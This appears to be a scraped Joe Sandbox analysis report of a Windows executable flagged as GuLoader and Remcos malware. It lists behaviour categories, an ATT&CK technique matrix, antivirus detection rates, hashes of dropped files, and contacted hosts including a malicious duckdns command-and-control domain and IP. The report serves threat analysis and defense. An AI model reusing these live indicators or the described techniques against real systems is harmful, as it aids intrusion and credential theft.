Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Thread sleep count: | Jump to behavior |
Source: | Code function: | 0_2_00405841 | |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 0_2_00406393 | |
Source: | Code function: | 17_2_220910F1 | |
Source: | Code function: | 17_2_22096580 | |
Source: | Code function: | 21_2_0040AE51 | |
Source: | Code function: | 24_2_00407EF8 | |
Source: | Code function: | 25_2_00407898 |
Source: | Code function: | 21_2_00418981 |
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-2864 | ||
Source: | API call chain: | graph_0-3043 | ||
Source: | API call chain: | graph_24-34116 |
Source: | Process information queried: | Jump to behavior |
Anti Debugging |
---|
Source: | Thread information set: | Jump to behavior | ||
Source: | Thread information set: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_040BD420 |
Source: | Code function: | 17_2_22092639 |
Source: | Code function: | 21_2_0040DD85 |
Source: | Code function: | 21_2_004044A4 |
Source: | Code function: | 17_2_22094AB4 |
Source: | Code function: | 17_2_2209724E |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 17_2_22092639 | |
Source: | Code function: | 17_2_22092B1C | |
Source: | Code function: | 17_2_220960E2 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 17_2_22092933 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 17_2_22092264 |
Source: | Code function: | 24_2_004082CD |
Source: | Code function: | 0_2_00406072 |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 24_2_004033F0 | |
Source: | Code function: | 24_2_00402DB3 | |
Source: | Code function: | 24_2_00402DB3 |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 11 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials In Files | 29 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 241 Security Software Discovery | SSH | 2 Clipboard Data | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
18% | ReversingLabs | Win32.Trojan.GuLoader | ||
24% | Virustotal | Browse | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
18% | ReversingLabs | Win32.Trojan.GuLoader | ||
27% | Virustotal | Browse |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
19% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
19% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
18% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
learfo55ozj01.duckdns.org | 193.222.96.21 | true | true |
| unknown |
geoplugin.net | 178.237.33.50 | true | false |
| unknown |
ricohltd.top | 172.67.191.112 | true | false |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
true |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | unknown | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | unknown | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | unknown | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.191.112 | ricohltd.top | United States | 13335 | CLOUDFLARENETUS | false | |
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false | |
193.222.96.21 | learfo55ozj01.duckdns.org | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1428643 |
Start date and time: | 2024-04-19 10:57:34 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 10m 26s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 30 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | UMMAN #U0130HRACAT AFR5641 910-1714 1633.exerenamed because original name is a hash value |
Original Sample Name: | UMMAN HRACAT AFR5641 910-1714 1633.exe |
Detection: | MAL |
Classification: | mal100.phis.troj.spyw.evad.winEXE@23/15@3/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 6756 because it is empty
- HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
10:58:25 | API Interceptor | |
12:35:16 | Autostart | |
12:35:24 | Autostart | |
12:35:48 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
178.237.33.50 | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
193.222.96.21 | Get hash | malicious | GuLoader, Remcos | Browse | ||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
learfo55ozj01.duckdns.org | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
geoplugin.net | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
| ||
ricohltd.top | Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
SWISSCOMSwisscomSwitzerlandLtdCH | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
ATOM86-ASATOM86NL | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader, Lokibot | Browse |
| ||
Get hash | malicious | FormBook | Browse |
|
⊘No context
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 963 |
Entropy (8bit): | 4.995620093649274 |
Encrypted: | false |
SSDEEP: | 12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro |
MD5: | 334018F02CE31BCBB4864D602B557FE5 |
SHA1: | C6DE43E8D6B5C026C0B0A56A898A3F00B282B881 |
SHA-256: | F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3 |
SHA-512: | 31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.838950934453595 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J |
MD5: | 4C24412D4F060F4632C0BD68CC9ECB54 |
SHA1: | 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF |
SHA-256: | 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE |
SHA-512: | 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15728640 |
Entropy (8bit): | 0.10103965264833503 |
Encrypted: | false |
SSDEEP: | 1536:GSB2jpSB2jFSjlK/4w/ZweshzbOlqVquesezbgl4KCIeszO/Zk3EufY:Ga6amUueqtDiu6b |
MD5: | 05ED31CC5A8F6E5591DCBD13F044B588 |
SHA1: | E224223FD7D82169BE2B50FA9C5AA514F6EBBC34 |
SHA-256: | 53CEC4FD5E5126208BA267073853ACD92BF70203157D20DCA7151B98882A914D |
SHA-512: | 1F82B82F706EE8ECFA1860E1F81334FAE5D95951B8731A9DE01166DE3925F7363580C78774E405842054E359E8631A9BF1FAC2A8BF22E3F8DCE523D3A0008C5F |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | modified |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:Qn:Qn |
MD5: | F3B25701FE362EC84616A93A45CE9998 |
SHA1: | D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB |
SHA-256: | B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
SHA-512: | 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 368 |
Entropy (8bit): | 3.393225874982098 |
Encrypted: | false |
SSDEEP: | 6:6l+F83ElQ8W5YcIeeDAlOWAAe5q1gWAAe5q1gWA7DxbN2fBMMm0v:6l/3R82ec0WFe5BWFe5BWItN25MMl |
MD5: | F4618607212C4B92494E4335B9D52266 |
SHA1: | 9066149A143660CA537580A6D36D7BE1038B8948 |
SHA-256: | CA5E635F23BA646FA2D9410D71285FCF55633E4661200D22EE5F4AECA92195B0 |
SHA-512: | E9A382F84E6EC9C3169601D963C3AC66DA1973F3C19F4B30489C8CB788D86BF4342420FDF36ED52A9493ACF8F732BFF60D06C62CC710DBC2F3A59200CC17F76B |
Malicious: | true |
Yara Hits: |
|
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\Slumretppe.hor
Download File
Process: | C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4996 |
Entropy (8bit): | 4.9612676235687445 |
Encrypted: | false |
SSDEEP: | 96:v48YsRVEpylVQratXvDeUeYSi80KFuwczSfTS48Bacs/OMRK2BL0Ab:v4XsRVCr0b/80KFuwNnA8OMRK2R0Ab |
MD5: | 3BF82F450A0DFD86F29536257623E2AD |
SHA1: | 286877538EC1D1D41A9819596B41B0289509CB51 |
SHA-256: | 614BB44D24BBB3B890649867E13FB15D86E5EA73179FD44E716B10FFCAA3C7C0 |
SHA-512: | 8B4CAD6568B4503E6E4171D22B8DB89E54449BF98D28C0D4D9F207AAAF56005E3406C8160A8365037F36CC4A7E4C537455ED6632371E2104CB718EC18C13D3CB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 515542 |
Entropy (8bit): | 7.485444386300452 |
Encrypted: | false |
SSDEEP: | 12288:fzA/ggggjlFZKqUVReLAu8xzRCf8CzQXX:U/ggggjHZbU5Po0CcXX |
MD5: | BF56C567703447C78773F3E581A004DB |
SHA1: | 80EC3B7F7B5F7E2DF367DFF512B508A21C682111 |
SHA-256: | 01BEEDA976D48DC4C029032B0113FED68E00A2736CC03667C065F7BF7440EEC2 |
SHA-512: | B67E817AB691AB8257826B5A90FB7731801765B5E1299F1EE5235AA36065D082A04CA276C735EEA0480A5E27382047B488227BD4E887A4176639CD64FD4C2F5B |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\bouillonterningens.skk
Download File
Process: | C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1089 |
Entropy (8bit): | 4.741939006979892 |
Encrypted: | false |
SSDEEP: | 24:HE9gSo1DFGgLzDlcBo5AW02oIypXdMUKI:k9EThzOBo5Ar2ovSI |
MD5: | A5A3506D7A85C6A0834F9C3D27FCE6C9 |
SHA1: | DC5600F7CCD5CAF8A924B70C2F45C1D7969F0E6B |
SHA-256: | 6329AFA66841B081B1479BBF17BE5A6DAB5863E736093DA1398CCB4FD48C56EC |
SHA-512: | 608B83DC77C28C663A9108B4F935E6DB82D470FA0392BD30FE9F7DC94E57D1BFAA5749F8ED3E489DD138FD12A2A6CBC488699660E0BFA7F24A1BD66DDAC1A1FB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\nondeferential.txt
Download File
Process: | C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 501 |
Entropy (8bit): | 4.228739463953974 |
Encrypted: | false |
SSDEEP: | 12:uHfW+5O384CuCatmRJ+8zBDg7epfF4HzZ/0d6Z9ya3Bl1SF9hm:u++5Ok7XwLep9kzZ89a3Jyhm |
MD5: | 368D84FCACBE7199AAD3FD09C7DF14A7 |
SHA1: | A5CA69A9DB10AFF8E8B7069B1800B8555B841C4D |
SHA-256: | 8BFFAB9063FF62AD2BE0622F70C9608FC039FCB4A4B1917081BD90ADC5C36935 |
SHA-512: | 9E27DBB488E00F1690086B6C1D28E1EEBFE4C1415A7A218DE93BAF210BAA26D7D8C484273AE51D269403B844C11C37832349204FAA1F7CB139585B9F7E26878E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 309645 |
Entropy (8bit): | 7.723924761431368 |
Encrypted: | false |
SSDEEP: | 6144:2BujOgCh9ozuHs1toDuYwYD6+Bb8j4Z7zDMWp+RuRpb:2B289ozO4iDlo+R24ZzMr6d |
MD5: | 16C2E56DE9C7BEA98D12E66613E04E83 |
SHA1: | F69245121A7B6A309F94C4DEA5D765E90200C5F2 |
SHA-256: | 2D7E6C0E1BCF0F9F4DB98C9CC7576CB87017F3DEFDFF31F5C83D3EB414E56E92 |
SHA-512: | 0C04B63973824E5F0403F99120DD250C316483FC13B689D428A979D52EBABECEEAA81751E0AED5E83A8C1AEDFB11990B2A38F9B84A82D7342D93B20B49901824 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Holomorph196.mil
Download File
Process: | C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4056 |
Entropy (8bit): | 4.860550085125353 |
Encrypted: | false |
SSDEEP: | 96:prxhfa2NwGYhNj+RR6UclY+w7RXMru7+AdWrY9NaR95:pr/lNChNy7cCtRcS2eI95 |
MD5: | 4E679D550C231C35094FEFB645F0D0B4 |
SHA1: | 26E9E728DCDA9CE0A9427DE64A8365DDB24090E2 |
SHA-256: | 3FCA5795690F2D6553CA5845BF9B122051AB8B7C05896078541A14DE00FB6BD7 |
SHA-512: | E0380BE7BED7AB78208FA0694FEDD3F5512BC6DDA0C29C3895DB4E6F814FC719DCFE933D1EC871B75FBD7B436C2C57BB0FCF9ACFB64E171C01C022B36F73F4BA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Recepternes.pen
Download File
Process: | C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59011 |
Entropy (8bit): | 5.320505996917177 |
Encrypted: | false |
